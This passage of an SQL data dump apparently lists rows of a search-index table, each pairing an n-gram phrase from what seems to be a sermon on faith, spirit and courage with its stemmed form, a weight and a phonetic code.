(291936, 'getting better spirit', 'get better spirit', 0, 1, 1.7, 'G3521362163', 1, '*'),
(291937, 'give it what', 'give it what', 0, 1, 1.4, 'G130', 1, '*'),
(291938, 'give you only', 'give you only', 0, 1, 1.4333, 'G154', 1, '*'),
(291939, 'give you what', 'give you what', 0, 1, 1.4333, 'G130', 1, '*'),
(291940, 'given us in', 'given us in', 0, 1, 1.3667, 'G1525', 1, '*'),
(291941, 'god comes you', 'god comes you', 0, 1, 1.4333, 'G3252', 1, '*'),
(291942, 'god daniel', 'god daniel', 0, 1, 1.3333, 'G354', 1, '*'),
(291943, 'god daniel carried', 'god daniel carried', 0, 1, 1.6, 'G354263', 1, '*'),
(291944, 'god gave us', 'god gave us', 0, 1, 1.3667, 'G3212', 1, '*'),
(291945, 'god takes', 'god takes', 0, 1, 1.3, 'G320', 1, '*'),
(291946, 'god takes you', 'god takes you', 0, 1, 1.4333, 'G320', 1, '*'),
(291947, 'god through the', 'god through the', 0, 1, 1.5, 'G3623', 1, '*'),
(291948, 'god with me', 'god with me', 0, 1, 1.3667, 'G350', 1, '*'),
(291949, 'great faith god', 'great faith god', 0, 1, 1.5, 'G631323', 1, '*'),
(291950, 'had the right', 'had the right', 0, 1, 1.4333, 'H3623', 1, '*'),
(291951, 'has a future', 'ha a future', 0, 1, 1.4, 'H2136', 1, '*'),
(291952, 'has been rain', 'ha been rain', 0, 1, 1.4333, 'H21565', 1, '*'),
(291953, 'has spoken expressly', 'ha spoken expressly', 0, 1, 1.6667, 'H212521624', 1, '*'),
(291954, 'he interacts', 'he interacts', 0, 1, 1.4, 'H536232', 1, '*'),
(291955, 'he interacts with', 'he interacts with', 0, 1, 1.5667, 'H5362323', 1, '*'),
(291956, 'he is afraid', 'he is afraid', 0, 1, 1.4, 'H2163', 1, '*'),
(291957, 'he will give', 'he will give', 0, 1, 1.4, 'H421', 2, '*'),
(291958, 'he works', 'he works', 0, 1, 1.2667, 'H620', 1, '*'),
(291959, 'he works upon', 'he works upon', 0, 1, 1.4333, 'H6215', 1, '*'),
(291960, 'heart 08', 'heart 08', 0, 1, 1.2667, 'H630', 1, '*'),
(291961, 'heart 08 01', 'heart 08 01', 0, 1, 1.3667, 'H630', 1, '*'),
(291962, 'heart a bold', 'heart a bold', 0, 1, 1.4, 'H63143', 1, '*'),
(291963, 'heart be', 'heart be', 0, 1, 1.2667, 'H631', 1, '*'),
(291964, 'heart be filled', 'heart be filled', 0, 1, 1.5, 'H63143', 1, '*'),
(291965, 'heart that can', 'heart that can', 0, 1, 1.4667, 'H6325', 1, '*'),
(291966, 'heart to', 'heart to', 0, 1, 1.2667, 'H630', 1, '*'),
(291967, 'heart to give', 'heart to give', 0, 1, 1.4333, 'H6321', 1, '*'),
(291968, 'hearth', 'hearth', 0, 0, 0.4, 'H630', 1, '*'),
(291969, 'hearth 08', 'hearth 08', 0, 1, 1.3, 'H630', 1, '*'),
(291970, 'hearth 08 01', 'hearth 08 01', 0, 1, 1.4, 'H630', 1, '*'),
(291971, 'hold fast', 'hold fast', 0, 1, 1.3, 'H43123', 1, '*'),
(291972, 'hold fast to', 'hold fast to', 0, 1, 1.4, 'H43123', 1, '*'),
(291973, 'hot season', 'hot season', 0, 1, 1.3333, 'H325', 1, '*'),
(291974, 'hot season dress', 'hot season dress', 0, 1, 1.5333, 'H325362', 1, '*'),
(291975, 'house for', 'hous for', 0, 1, 1.3, 'H216', 1, '*'),
(291976, 'house for this', 'hous for this', 0, 1, 1.4667, 'H21632', 1, '*'),
(291977, 'i am ordained', 'i am ordained', 0, 1, 1.4333, 'I56353', 1, '*'),
(291978, 'illegally', 'illeg', 0, 0, 0.6, 'I424', 1, '*'),
(291979, 'illegally that', 'illeg that', 0, 1, 1.4667, 'I4243', 1, '*'),
(291980, 'illegally that does', 'illeg that does', 0, 1, 1.6333, 'I42432', 1, '*'),
(291981, 'impartations', 'impart', 0, 0, 0.8, 'I516352', 1, '*'),
(291982, 'impartations and', 'impart and', 0, 1, 1.5333, 'I51635253', 1, '*'),
(291983, 'impartations and covenants', 'impart and covenants', 0, 1, 1.8667, 'I5163525321532', 1, '*'),
(291984, 'impartations upon', 'impart upon', 0, 1, 1.5667, 'I51635215', 1, '*'),
(291985, 'impartations upon us', 'impart upon us', 0, 1, 1.6667, 'I516352152', 1, '*'),
(291986, 'in 2017 ask', 'in 2017 ask', 0, 1, 1.3667, 'I520', 1, '*'),
(291987, 'in 2017 this', 'in 2017 this', 0, 1, 1.4, 'I532', 1, '*'),
(291988, 'in life legally', 'in life legally', 0, 1, 1.5, 'I541424', 1, '*'),
(291989, 'in numbers', 'in numbers', 0, 1, 1.3333, 'I5162', 1, '*'),
(291990, 'in numbers chapters', 'in numbers chapters', 0, 1, 1.6333, 'I51621362', 1, '*'),
(291991, 'in the arena', 'in the arena', 0, 1, 1.4, 'I5365', 1, '*'),
(291992, 'inside that', 'insid that', 0, 1, 1.3667, 'I523', 1, '*'),
(291993, 'inside that god', 'insid that god', 0, 1, 1.5, 'I52323', 1, '*'),
(291994, 'interacts', 'interact', 0, 0, 0.6, 'I536232', 1, '*'),
(291995, 'interacts with', 'interact with', 0, 1, 1.4667, 'I5362323', 1, '*'),
(291996, 'interacts with deceptive', 'interact with deceptive', 0, 1, 1.8, 'I53623232131', 1, '*'),
(291997, 'into 2017 don\'t', 'into 2017 don', 0, 1, 1.5, 'I5353', 1, '*'),
(291998, 'is 2017', 'is 2017', 0, 1, 1.2333, 'I200', 1, '*'),
(291999, 'is 2017 mercy', 'is 2017 mercy', 0, 1, 1.4333, 'I2562', 1, '*'),
(292000, 'is a failure', 'is a failure', 0, 1, 1.4, 'I2146', 1, '*'),
(292001, 'is a life', 'is a life', 0, 1, 1.3, 'I241', 1, '*'),
(292002, 'is a thing', 'is a thing', 0, 1, 1.3333, 'I2352', 1, '*'),
(292003, 'is about making', 'is about making', 0, 1, 1.5, 'I2135252', 1, '*'),
(292004, 'is afraid', 'is afraid', 0, 1, 1.3, 'I2163', 1, '*'),
(292005, 'is afraid boldness', 'is afraid boldness', 0, 1, 1.6, 'I216314352', 1, '*'),
(292006, 'is an event', 'is an event', 0, 1, 1.3667, 'I25153', 1, '*'),
(292007, 'is cold', 'is cold', 0, 1, 1.2333, 'I243', 1, '*'),
(292008, 'is cold season', 'is cold season', 0, 1, 1.4667, 'I24325', 1, '*'),
(292009, 'is crucial to', 'is crucial to', 0, 1, 1.4333, 'I26243', 1, '*'),
(292010, 'is get', 'is get', 0, 1, 1.2, 'I230', 1, '*'),
(292011, 'is get it', 'is get it', 0, 1, 1.3, 'I230', 1, '*'),
(292012, 'is the spirit', 'is the spirit', 0, 1, 1.4333, 'I232163', 1, '*'),
(292013, 'is what will', 'is what will', 0, 1, 1.4, 'I234', 1, '*'),
(292014, 'it by your', 'it by your', 0, 1, 1.3333, 'I316', 1, '*'),
(292015, 'it is 2017', 'it is 2017', 0, 1, 1.3333, 'I320', 1, '*'),
(292016, 'it just', 'it just', 0, 1, 1.2333, 'I323', 1, '*'),
(292017, 'it just tells', 'it just tells', 0, 1, 1.4333, 'I32342', 1, '*'),
(292018, 'it let', 'it let', 0, 1, 1.2, 'I343', 1, '*'),
(292019, 'it let your', 'it let your', 0, 1, 1.3667, 'I3436', 1, '*'),
(292020, 'it paul', 'it paul', 0, 1, 1.2333, 'I314', 1, '*'),
(292021, 'it paul also', 'it paul also', 0, 1, 1.4, 'I3142', 1, '*'),
(292022, 'it right and', 'it right and', 0, 1, 1.4, 'I362353', 1, '*'),
(292023, 'it right get', 'it right get', 0, 1, 1.4, 'I362323', 1, '*'),
(292024, 'it right on', 'it right on', 0, 1, 1.3667, 'I36235', 1, '*'),
(292025, 'it spirit', 'it spirit', 0, 1, 1.3, 'I32163', 1, '*'),
(292026, 'it spirit of', 'it spirit of', 0, 1, 1.4, 'I321631', 1, '*'),
(292027, 'it takes lawfully', 'it takes lawfully', 0, 1, 1.5667, 'I32414', 1, '*'),
(292028, 'it takes the', 'it takes the', 0, 1, 1.4, 'I323', 1, '*'),
(292029, 'it what', 'it what', 0, 1, 1.2333, 'I300', 1, '*'),
(292030, 'it what it', 'it what it', 0, 1, 1.3333, 'I300', 1, '*'),
(292031, 'it you must', 'it you must', 0, 1, 1.3667, 'I3523', 1, '*'),
(292032, 'it\'s what', 'it what', 0, 1, 1.3, 'I323', 1, '*'),
(292033, 'it\'s what makes', 'it what makes', 0, 1, 1.5, 'I32352', 1, '*'),
(292034, 'item 13', 'item 13', 0, 1, 1.2333, 'I350', 1, '*'),
(292035, 'item 13 father', 'item 13 father', 0, 1, 1.4667, 'I35136', 1, '*'),
(292036, 'jesus by', 'jesu by', 0, 1, 1.2667, 'J100', 1, '*'),
(292037, 'jesus by faith', 'jesu by faith', 0, 1, 1.4667, 'J130', 1, '*'),
(292038, 'join', 'join', 0, 0, 0.2667, 'J500', 4, '*'),
(292039, 'join the', 'join the', 0, 1, 1.2667, 'J530', 2, '*'),
(292040, 'join the rank', 'join the rank', 0, 1, 1.4333, 'J53652', 1, '*'),
(292041, 'joseph carried', 'joseph carried', 0, 1, 1.4667, 'J1263', 1, '*'),
(292042, 'joseph carried that', 'joseph carried that', 0, 1, 1.6333, 'J1263', 1, '*'),
(292043, 'joshua had', 'joshua had', 0, 1, 1.3333, 'J300', 1, '*'),
(292044, 'joshua had the', 'joshua had the', 0, 1, 1.4667, 'J300', 1, '*'),
(292045, 'just tells', 'just tells', 0, 1, 1.3333, 'J342', 1, '*'),
(292046, 'just tells the', 'just tells the', 0, 1, 1.4667, 'J3423', 1, '*'),
(292047, 'k2 item 13', 'k2 item 13', 0, 1, 1.3333, 'K350', 1, '*'),
(292048, 'keep doing', 'keep doing', 0, 1, 1.3333, 'K1352', 1, '*'),
(292049, 'keep doing whats', 'keep doing whats', 0, 1, 1.5333, 'K135232', 1, '*'),
(292050, 'keep getting', 'keep getting', 0, 1, 1.4, 'K12352', 1, '*'),
(292051, 'keep getting better', 'keep getting better', 0, 1, 1.6333, 'K12352136', 1, '*'),
(292052, 'key for', 'kei for', 0, 1, 1.2333, 'K160', 1, '*'),
(292053, 'key for this', 'kei for this', 0, 1, 1.4, 'K1632', 1, '*'),
(292054, 'kind of evil', 'kind of evil', 0, 1, 1.4, 'K5314', 1, '*'),
(292055, 'kind of funny', 'kind of funny', 0, 1, 1.4333, 'K5315', 1, '*'),
(292056, 'kind of heart', 'kind of heart', 0, 1, 1.4333, 'K53163', 1, '*'),
(292057, 'kinds of faith', 'kind of faith', 0, 1, 1.4667, 'K53213', 1, '*'),
(292058, 'knows no', 'know no', 0, 1, 1.2667, 'K525', 1, '*'),
(292059, 'knows no defeat', 'know no defeat', 0, 1, 1.5, 'K525313', 1, '*'),
(292060, 'land there', 'land there', 0, 1, 1.3333, 'L536', 1, '*'),
(292061, 'land there are', 'land there are', 0, 1, 1.4667, 'L536', 1, '*'),
(292062, 'last days but', 'last days but', 0, 1, 1.4333, 'L23213', 1, '*'),
(292063, 'lawfully', 'lawfulli', 0, 0, 0.5333, 'L140', 1, '*'),
(292064, 'lawfully at', 'lawfulli at', 0, 1, 1.3667, 'L143', 1, '*'),
(292065, 'lawfully at all', 'lawfulli at all', 0, 1, 1.5, 'L1434', 1, '*'),
(292066, 'legally', 'legal', 0, 0, 0.4667, 'L240', 1, '*'),
(292067, 'legally or', 'legal or', 0, 1, 1.3333, 'L246', 1, '*'),
(292068, 'legally or illegally', 'legal or illegally', 0, 1, 1.6667, 'L246424', 1, '*'),
(292069, 'let your accountability', 'let your accountability', 0, 1, 1.7667, 'L36253143', 1, '*'),
(292070, 'life legally', 'life legally', 0, 1, 1.4, 'L1424', 1, '*'),
(292071, 'life legally or', 'life legally or', 0, 1, 1.5, 'L14246', 1, '*'),
(292072, 'life that the', 'life that the', 0, 1, 1.4333, 'L130', 1, '*'),
(292073, 'life this year', 'life this year', 0, 1, 1.4667, 'L1326', 1, '*'),
(292074, 'life you must', 'life you must', 0, 1, 1.4333, 'L1523', 2, '*'),
(292075, 'little faith', 'littl faith', 0, 1, 1.4, 'L3413', 1, '*'),
(292076, 'little faith and', 'littl faith and', 0, 1, 1.5333, 'L341353', 1, '*'),
(292077, 'lord has spoken', 'lord has spoken', 0, 1, 1.5, 'L632125', 1, '*'),
(292078, 'lose because', 'lose because', 0, 1, 1.4, 'L212', 1, '*'),
(292079, 'lose because i', 'lose because i', 0, 1, 1.4667, 'L212', 1, '*'),
(292080, 'makes a', 'make a', 0, 1, 1.2333, 'M200', 1, '*'),
(292081, 'makes a man', 'make a man', 0, 1, 1.3667, 'M250', 1, '*'),
(292082, 'making face', 'make face', 0, 1, 1.3667, 'M25212', 1, '*'),
(292083, 'making face courage', 'make face courage', 0, 1, 1.6333, 'M2521262', 1, '*'),
(292084, 'man can start', 'man can start', 0, 1, 1.4333, 'M252363', 1, '*'),
(292085, 'man of courage', 'man of courage', 0, 1, 1.4667, 'M1262', 1, '*'),
(292086, 'man to believe', 'man to believe', 0, 1, 1.4667, 'M3141', 1, '*'),
(292087, 'man to keep', 'man to keep', 0, 1, 1.3667, 'M321', 1, '*'),
(292088, 'man when', 'man when', 0, 1, 1.2667, 'M000', 1, '*'),
(292089, 'man when he', 'man when he', 0, 1, 1.3667, 'M000', 1, '*'),
(292090, 'mark your', 'mark your', 0, 1, 1.3, 'M626', 1, '*'),
(292091, 'mark your life', 'mark your life', 0, 1, 1.4667, 'M62641', 1, '*'),
(292092, 'matter the two', 'matter the two', 0, 1, 1.4667, 'M363', 1, '*'),
(292093, 'me we', 'me we', 0, 1, 1.1667, 'M000', 1, '*'),
(292094, 'me we will', 'me we will', 0, 1, 1.3333, 'M400', 1, '*'),
(292095, 'me you\'ve', 'me you', 0, 1, 1.3, 'M100', 1, '*'),
(292096, 'me you\'ve picked', 'me you picked', 0, 1, 1.5333, 'M123', 1, '*'),
(292097, 'men in', 'men in', 0, 1, 1.2, 'M000', 1, '*'),
(292098, 'men in the', 'men in the', 0, 1, 1.3333, 'M300', 1, '*'),
(292099, 'men with the', 'men with the', 0, 1, 1.4, 'M300', 1, '*'),
(292100, 'mercy', 'merci', 0, 0, 0.3333, 'M620', 1, '*'),
(292101, 'mercy the', 'merci the', 0, 1, 1.3, 'M623', 1, '*'),
(292102, 'mercy the lord', 'merci the lord', 0, 1, 1.4667, 'M623463', 1, '*'),
(292103, 'might be evil', 'might be evil', 0, 1, 1.4333, 'M2314', 1, '*'),
(292104, 'minute', 'minut', 0, 0, 0.4, 'M300', 1, '*'),
(292105, 'minute you', 'minut you', 0, 1, 1.3333, 'M300', 1, '*'),
(292106, 'minute you decide', 'minut you decide', 0, 1, 1.5667, 'M323', 1, '*'),
(292107, 'mountains spirit', 'mountain spirit', 0, 1, 1.5333, 'M352163', 1, '*'),
(292108, 'mountains spirit of', 'mountain spirit of', 0, 1, 1.6333, 'M3521631', 1, '*'),
(292109, 'must carry it', 'must carry it', 0, 1, 1.4333, 'M23263', 1, '*'),
(292110, 'must carry the', 'must carry the', 0, 1, 1.4667, 'M23263', 2, '*'),
(292111, 'must have the', 'must have the', 0, 1, 1.4333, 'M2313', 1, '*'),
(292112, 'must hold', 'must hold', 0, 1, 1.3, 'M2343', 1, '*'),
(292113, 'must hold fast', 'must hold fast', 0, 1, 1.4667, 'M2343123', 1, '*'),
(292114, 'must wear', 'must wear', 0, 1, 1.3, 'M236', 1, '*'),
(292115, 'must wear that', 'must wear that', 0, 1, 1.4667, 'M2363', 1, '*'),
(292116, 'names but', 'name but', 0, 1, 1.3, 'N213', 1, '*'),
(292117, 'names but the', 'name but the', 0, 1, 1.4333, 'N213', 1, '*'),
(292118, 'names of', 'name of', 0, 1, 1.2667, 'N210', 1, '*'),
(292119, 'names of jesus', 'name of jesus', 0, 1, 1.4667, 'N212', 1, '*'),
(292120, 'nature that', 'natur that', 0, 1, 1.3667, 'N363', 1, '*'),
(292121, 'nature that causes', 'natur that causes', 0, 1, 1.6, 'N3632', 1, '*'),
(292122, 'need the', 'need the', 0, 1, 1.2667, 'N300', 1, '*'),
(292123, 'need the following', 'need the following', 0, 1, 1.6, 'N31452', 1, '*'),
(292124, 'need to wear', 'need to wear', 0, 1, 1.4, 'N360', 1, '*'),
(292125, 'no defeat', 'no defeat', 0, 1, 1.3, 'N313', 1, '*'),
(292126, 'no defeat caleb', 'no defeat caleb', 0, 1, 1.5, 'N313241', 1, '*'),
(292127, 'no faith', 'no faith', 0, 1, 1.2667, 'N130', 1, '*'),
(292128, 'no faith little', 'no faith little', 0, 1, 1.5, 'N13434', 1, '*'),
(292129, 'nobody has', 'nobodi has', 0, 1, 1.3333, 'N132', 1, '*'),
(292130, 'nobody has a', 'nobodi has a', 0, 1, 1.4, 'N132', 1, '*'),
(292131, 'nobody that', 'nobodi that', 0, 1, 1.3667, 'N130', 1, '*'),
(292132, 'nobody that succeeds', 'nobodi that succeeds', 0, 1, 1.6667, 'N13232', 1, '*'),
(292133, 'not be deceived', 'not be deceived', 0, 1, 1.5, 'N313213', 1, '*'),
(292134, 'not come it', 'not come it', 0, 1, 1.3667, 'N3253', 1, '*'),
(292135, 'not face', 'not face', 0, 1, 1.2667, 'N312', 1, '*'),
(292136, 'not face is', 'not face is', 0, 1, 1.3667, 'N312', 1, '*'),
(292137, 'not face the', 'not face the', 0, 1, 1.4, 'N3123', 1, '*'),
(292138, 'not give', 'not give', 0, 1, 1.2667, 'N321', 1, '*'),
(292139, 'not give you', 'not give you', 0, 1, 1.4, 'N321', 1, '*'),
(292140, 'not prepared', 'not prepared', 0, 1, 1.4, 'N316163', 1, '*'),
(292141, 'not prepared for', 'not prepared for', 0, 1, 1.5333, 'N31616316', 1, '*'),
(292142, 'not say', 'not say', 0, 1, 1.2333, 'N320', 1, '*'),
(292143, 'not say the', 'not say the', 0, 1, 1.3667, 'N323', 1, '*'),
(292144, 'numbers', 'number', 0, 0, 0.4667, 'N162', 1, '*'),
(292145, 'numbers chapters', 'number chapters', 0, 1, 1.5333, 'N1621362', 1, '*'),
(292146, 'numbers chapters 13', 'number chapters 13', 0, 1, 1.6333, 'N1621362', 1, '*'),
(292147, 'occasions', 'occas', 0, 0, 0.6, 'O252', 1, '*'),
(292148, 'occasions dressing', 'occas dressing', 0, 1, 1.6, 'O25236252', 1, '*'),
(292149, 'occasions dressing is', 'occas dressing is', 0, 1, 1.7, 'O25236252', 1, '*'),
(292150, 'of accountability', 'of accountability', 0, 1, 1.5667, 'O1253143', 1, '*'),
(292151, 'of accountability is', 'of accountability is', 0, 1, 1.6667, 'O12531432', 1, '*'),
(292152, 'of accountability this', 'of accountability this', 0, 1, 1.7333, 'O12531432', 1, '*'),
(292153, 'of accuracy', 'of accuracy', 0, 1, 1.3667, 'O1262', 1, '*'),
(292154, 'of accuracy a', 'of accuracy a', 0, 1, 1.4333, 'O1262', 1, '*'),
(292155, 'of courage', 'of courage', 0, 1, 1.3333, 'O1262', 1, '*'),
(292156, 'of courage it\'s', 'of courage it', 0, 1, 1.5, 'O126232', 1, '*'),
(292157, 'of courage willactually', 'of courage willactually', 0, 1, 1.7667, 'O12624234', 1, '*'),
(292158, 'of evil', 'of evil', 0, 1, 1.2333, 'O140', 1, '*'),
(292159, 'of evil deception', 'of evil deception', 0, 1, 1.5667, 'O1432135', 1, '*'),
(292160, 'of faith that', 'of faith that', 0, 1, 1.4333, 'O130', 1, '*'),
(292161, 'of faith the', 'of faith the', 0, 1, 1.4, 'O130', 1, '*'),
(292162, 'of faith when', 'of faith when', 0, 1, 1.4333, 'O135', 1, '*'),
(292163, 'of funny', 'of funny', 0, 1, 1.2667, 'O150', 1, '*'),
(292164, 'of funny names', 'of funny names', 0, 1, 1.4667, 'O152', 1, '*'),
(292165, 'of heart that', 'of heart that', 0, 1, 1.4333, 'O163', 1, '*'),
(292166, 'of impartations', 'of impartations', 0, 1, 1.5, 'O1516352', 1, '*'),
(292167, 'of impartations upon', 'of impartations upon', 0, 1, 1.6667, 'O151635215', 1, '*'),
(292168, 'of jesus by', 'of jesus by', 0, 1, 1.3667, 'O121', 1, '*'),
(292169, 'of life there', 'of life there', 0, 1, 1.4333, 'O14136', 1, '*'),
(292170, 'of no', 'of no', 0, 1, 1.1667, 'O150', 1, '*'),
(292171, 'of no faith', 'of no faith', 0, 1, 1.3667, 'O1513', 1, '*'),
(292172, 'of precision', 'of precision', 0, 1, 1.4, 'O1625', 1, '*'),
(292173, 'of precision that', 'of precision that', 0, 1, 1.5667, 'O16253', 1, '*'),
(292174, 'of the heart', 'of the heart', 0, 1, 1.4, 'O1363', 1, '*'),
(292175, 'of the successful', 'of the successful', 0, 1, 1.5667, 'O13214', 1, '*'),
(292176, 'of truth', 'of truth', 0, 1, 1.2667, 'O1363', 1, '*'),
(292177, 'of truth there', 'of truth there', 0, 1, 1.4667, 'O13636', 1, '*'),
(292178, 'of truth to', 'of truth to', 0, 1, 1.3667, 'O1363', 1, '*'),
(292179, 'of truth will', 'of truth will', 0, 1, 1.4333, 'O13634', 1, '*'),
(292180, 'of victory assures', 'of victory assures', 0, 1, 1.6, 'O1236262', 1, '*'),
(292181, 'of victory does', 'of victory does', 0, 1, 1.5, 'O123632', 1, '*'),
(292182, 'of victory knows', 'of victory knows', 0, 1, 1.5333, 'O1236252', 1, '*'),
(292183, 'of victory the', 'of victory the', 0, 1, 1.4667, 'O12363', 1, '*'),
(292184, 'of your time', 'of your time', 0, 1, 1.4, 'O1635', 1, '*'),
(292185, 'offer', 'offer', 0, 0, 0.3333, 'O160', 1, '*'),
(292186, 'offer of', 'offer of', 0, 1, 1.2667, 'O161', 1, '*'),
(292187, 'offer of god', 'offer of god', 0, 1, 1.4, 'O16123', 1, '*'),
(292188, 'on time and', 'on time and', 0, 1, 1.3667, 'O5353', 1, '*'),
(292189, 'only be able', 'onli be able', 0, 1, 1.4, 'O5414', 1, '*'),
(292190, 'only what you', 'onli what you', 0, 1, 1.4333, 'O543', 1, '*'),
(292191, 'opponent', 'oppon', 0, 0, 0.5333, 'O153', 1, '*'),
(292192, 'opponent get', 'oppon get', 0, 1, 1.4, 'O15323', 1, '*'),
(292193, 'opponent get ready', 'oppon get ready', 0, 1, 1.6, 'O1532363', 1, '*'),
(292194, 'or illegally', 'or illegally', 0, 1, 1.4, 'O6424', 1, '*'),
(292195, 'or illegally that', 'or illegally that', 0, 1, 1.5667, 'O64243', 1, '*'),
(292196, 'ordained to', 'ordain to', 0, 1, 1.3667, 'O6353', 1, '*'),
(292197, 'ordained to win.”', 'ordain to win.”', 0, 1, 1.5667, 'O63535', 1, '*'),
(292198, 'others ran', 'other ran', 0, 1, 1.3333, 'O36265', 1, '*'),
(292199, 'others ran away', 'other ran away', 0, 1, 1.5, 'O36265', 1, '*'),
(292200, 'paul also', 'paul also', 0, 1, 1.3, 'P420', 1, '*'),
(292201, 'paul also carried', 'paul also carried', 0, 1, 1.5667, 'P4263', 1, '*'),
(292202, 'pays attention', 'pai attention', 0, 1, 1.4667, 'P23535', 1, '*'),
(292203, 'pays attention to', 'pai attention to', 0, 1, 1.5667, 'P235353', 1, '*'),
(292204, 'people will call', 'peopl will call', 0, 1, 1.5333, 'P424', 1, '*'),
(292205, 'person that the', 'person that the', 0, 1, 1.5, 'P6253', 1, '*'),
(292206, 'place in these', 'place in these', 0, 1, 1.4667, 'P42532', 1, '*'),
(292207, 'pleasing god daniel', 'pleas god daniel', 0, 1, 1.6333, 'P4252354', 1, '*'),
(292208, 'position and status', 'posit and status', 0, 1, 1.6333, 'P2353232', 1, '*'),
(292209, 'positions', 'posit', 0, 0, 0.6, 'P2352', 1, '*'),
(292210, 'positions dressing', 'posit dressing', 0, 1, 1.6, 'P235236252', 1, '*'),
(292211, 'positions dressing also', 'posit dressing also', 0, 1, 1.7667, 'P23523625242', 1, '*'),
(292212, 'possess what', 'possess what', 0, 1, 1.4, 'P230', 1, '*'),
(292213, 'possess what the', 'possess what the', 0, 1, 1.5333, 'P230', 1, '*'),
(292214, 'precision', 'precis', 0, 0, 0.6, 'P625', 1, '*'),
(292215, 'precision that', 'precis that', 0, 1, 1.4667, 'P6253', 1, '*'),
(292216, 'precision that draws', 'precis that draws', 0, 1, 1.6667, 'P625362', 1, '*'),
(292217, 'prepared for he', 'prepar for he', 0, 1, 1.5, 'P616316', 1, '*'),
(292218, 'promised land', 'promis land', 0, 1, 1.4333, 'P6523453', 1, '*'),
(292219, 'promised land there', 'promis land there', 0, 1, 1.6333, 'P65234536', 1, '*'),
(292220, 'protect a', 'protect a', 0, 1, 1.3, 'P6323', 1, '*'),
(292221, 'protect a man', 'protect a man', 0, 1, 1.4333, 'P63235', 1, '*'),
(292222, 'protections', 'protect', 0, 0, 0.7333, 'P632352', 1, '*'),
(292223, 'protections be', 'protect be', 0, 1, 1.4667, 'P6323521', 1, '*'),
(292224, 'protections be correctly', 'protect be correctly', 0, 1, 1.8, 'P632352126234', 1, '*'),
(292225, 'rain', 'rain', 0, 0, 0.2667, 'R500', 1, '*'),
(292226, 'rain of', 'rain of', 0, 1, 1.2333, 'R510', 1, '*'),
(292227, 'rain of impartations', 'rain of impartations', 0, 1, 1.6667, 'R51516352', 1, '*'),
(292228, 'ran away', 'ran away', 0, 1, 1.2667, 'R500', 1, '*'),
(292229, 'ran away from', 'ran away from', 0, 1, 1.4333, 'R5165', 1, '*'),
(292230, 'rank', 'rank', 0, 0, 0.2667, 'R520', 1, '*'),
(292231, 'rank of', 'rank of', 0, 1, 1.2333, 'R521', 1, '*'),
(292232, 'rank of the', 'rank of the', 0, 1, 1.3667, 'R5213', 1, '*'),
(292233, 'ready before', 'readi before', 0, 1, 1.4, 'R316', 1, '*'),
(292234, 'ready before the', 'readi before the', 0, 1, 1.5333, 'R3163', 1, '*'),
(292235, 'ready for dressing', 'readi for dressing', 0, 1, 1.6, 'R31636252', 1, '*'),
(292236, 'ready for the', 'readi for the', 0, 1, 1.4333, 'R3163', 1, '*'),
(292237, 'ready to lose', 'readi to lose', 0, 1, 1.4333, 'R342', 1, '*'),
(292238, 'reflects', 'reflect', 0, 0, 0.5333, 'R14232', 1, '*'),
(292239, 'reflects positions', 'reflect positions', 0, 1, 1.6, 'R1423212352', 1, '*'),
(292240, 'reflects positions dressing', 'reflect positions dressing', 0, 1, 1.9, 'R142321235236252', 1, '*'),
(292241, 'reflects your', 'reflect your', 0, 1, 1.4333, 'R142326', 1, '*'),
(292242, 'reflects your position', 'reflect your position', 0, 1, 1.7333, 'R1423261235', 1, '*'),
(292243, 'reports', 'report', 0, 0, 0.4667, 'R1632', 1, '*'),
(292244, 'reports but', 'report but', 0, 1, 1.3667, 'R163213', 1, '*'),
(292245, 'reports but you', 'report but you', 0, 1, 1.5, 'R163213', 1, '*'),
(292246, 'right and get', 'right and get', 0, 1, 1.4333, 'R235323', 1, '*'),
(292247, 'right dressing', 'right dressing', 0, 1, 1.4667, 'R236252', 1, '*'),
(292248, 'right dressing to', 'right dressing to', 0, 1, 1.5667, 'R2362523', 1, '*'),
(292249, 'right even', 'right even', 0, 1, 1.3333, 'R2315', 1, '*'),
(292250, 'right even when', 'right even when', 0, 1, 1.5, 'R2315', 1, '*'),
(292251, 'right get', 'right get', 0, 1, 1.3, 'R2323', 1, '*'),
(292252, 'right get it', 'right get it', 0, 1, 1.4, 'R2323', 1, '*'),
(292253, 'right on', 'right on', 0, 1, 1.2667, 'R235', 1, '*'),
(292254, 'right on time', 'right on time', 0, 1, 1.4333, 'R23535', 1, '*'),
(292255, 'right spirit', 'right spirit', 0, 1, 1.4, 'R232163', 1, '*'),
(292256, 'right spirit dressing', 'right spirit dressing', 0, 1, 1.7, 'R2321636252', 1, '*'),
(292257, 'right spirit will', 'right spirit will', 0, 1, 1.5667, 'R2321634', 1, '*'),
(292258, 'road spirit', 'road spirit', 0, 1, 1.3667, 'R32163', 1, '*'),
(292259, 'road spirit of', 'road spirit of', 0, 1, 1.4667, 'R321631', 1, '*'),
(292260, 's hearth', 's hearth', 0, 1, 1.2667, 'S630', 1, '*'),
(292261, 's hearth 08', 's hearth 08', 0, 1, 1.3667, 'S630', 1, '*'),
(292262, 'say the', 'sai the', 0, 1, 1.2333, 'S300', 1, '*'),
(292263, 'say the enemy', 'sai the enemy', 0, 1, 1.4333, 'S350', 1, '*'),
(292264, 'says will', 'sai will', 0, 1, 1.3, 'S400', 1, '*'),
(292265, 'says will take', 'sai will take', 0, 1, 1.4667, 'S432', 1, '*'),
(292266, 'season dress', 'season dress', 0, 1, 1.4, 'S5362', 1, '*'),
(292267, 'season dress and', 'season dress and', 0, 1, 1.5333, 'S536253', 1, '*'),
(292268, 'season dress dressing', 'season dress dressing', 0, 1, 1.7, 'S536236252', 1, '*'),
(292269, 'season there', 'season there', 0, 1, 1.4, 'S536', 1, '*'),
(292270, 'season there is', 'season there is', 0, 1, 1.5, 'S5362', 1, '*'),
(292271, 'sharpness', 'sharp', 0, 0, 0.6, 'S6152', 1, '*'),
(292272, 'sharpness to', 'sharp to', 0, 1, 1.4, 'S61523', 1, '*'),
(292273, 'sharpness to where', 'sharp to where', 0, 1, 1.6, 'S615236', 1, '*'),
(292274, 'shows who', 'show who', 0, 1, 1.3, 'S000', 1, '*'),
(292275, 'shows who you', 'show who you', 0, 1, 1.4333, 'S000', 1, '*'),
(292276, 'situation around', 'situat around', 0, 1, 1.5333, 'S35653', 1, '*'),
(292277, 'situation around you', 'situat around you', 0, 1, 1.6667, 'S35653', 1, '*'),
(292278, 'spend the', 'spend the', 0, 1, 1.3, 'S153', 1, '*'),
(292279, 'spend the bulk', 'spend the bulk', 0, 1, 1.4667, 'S153142', 1, '*'),
(292280, 'spirit dressing', 'spirit dressing', 0, 1, 1.5, 'S1636252', 1, '*'),
